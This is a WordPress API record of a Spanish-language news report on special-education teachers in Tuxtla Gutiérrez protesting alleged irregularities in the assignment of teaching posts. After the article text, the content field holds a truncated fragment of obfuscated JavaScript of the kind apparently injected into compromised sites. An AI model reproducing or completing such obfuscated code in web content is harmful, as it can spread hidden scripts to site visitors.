{"id":16867,"date":"2024-07-24T07:10:24","date_gmt":"2024-07-24T07:10:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16867"},"modified":"2024-07-24T07:10:25","modified_gmt":"2024-07-24T07:10:25","slug":"educadoras-denuncian-irregularidades-en-la-designacion-de-plazas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16867","title":{"rendered":"Educadoras denuncian irregularidades en la designaci\u00f3n de plazas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"463\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721804916930.jpg\" alt=\"\" class=\"wp-image-16868\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721804916930.jpg 600w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721804916930-300x232.jpg 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/figure>\n\n\n\n<p>Jaime Montero.<\/p>\n\n\n\n<p>23 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana, docentes del nivel de educaci\u00f3n especial de la Secci\u00f3n VII del Sindicato y Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (SNTE-CNTE), se manifestaron en las instalaciones de la Escuela Normal de Educadoras &#8220;Bertha Von Glumer&#8221; en donde se\u00f1alaron diferentes irregularidades en la designaci\u00f3n de plazas docentes.<\/p>\n\n\n\n<p>Destacaron que, la cadena de cambios es un procedimiento clave para la asignaci\u00f3n de plazas y cargos dentro del sistema educativo.<\/p>\n\n\n\n<p>De acuerdo con Erika Reyes, titular de la Secretar\u00eda de Trabajos y Conflictos del nivel educaci\u00f3n especial de la Secci\u00f3n 7, explic\u00f3 que se daba inicio a la cadena de cambio, un procedimiento para la asignaci\u00f3n de plazas y cargos en el sistema educativo; sin embargo detectaron actos arbitrarios.<br>\u201cEst\u00e1n metiendo a gente que no pertenecen a nuestro nivel, est\u00e1n escondiendo los espacios de la cadena de cambio\u2026 educaci\u00f3n especial es uno de los niveles m\u00e1s peque\u00f1os de la Secretar\u00eda de Educaci\u00f3n Federalizada, estamos emprendiendo una lucha en contra de las arbitrariedades de la jefa del departamento\u201d.<br>Extern\u00f3 que la jefa de departamento no les ha permitido el di\u00e1logo y ha intentado desestabilizar a los m\u00e1s de 100 maestros afectados que vienen de varias partes del estado.<br>\u201cElla no genera las condiciones reales para que nosotros los trabajadores de educaci\u00f3n especial podamos desempe\u00f1ar nuestras funciones con toda la equidad\u201d, replic\u00f3.<br>Sostuvo que mantendr\u00e1n tomas las instalaciones hasta obtener una respuesta del documento de impugnaci\u00f3n que se entreg\u00f3 a la direcci\u00f3n de la Secretar\u00eda de Educaci\u00f3n, en las instalaciones de la unidad administrativa.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jaime Montero. 23 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana, docentes del nivel de educaci\u00f3n especial de la Secci\u00f3n VII del Sindicato y Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (SNTE-CNTE), se manifestaron en las instalaciones de la Escuela Normal de Educadoras &#8220;Bertha Von Glumer&#8221; en donde se\u00f1alaron diferentes irregularidades &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16868,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16867","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16867","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16867"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16867\/revisions"}],"predecessor-version":[{"id":16869,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16867\/revisions\/16869"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16868"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16867"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16867"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16867"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}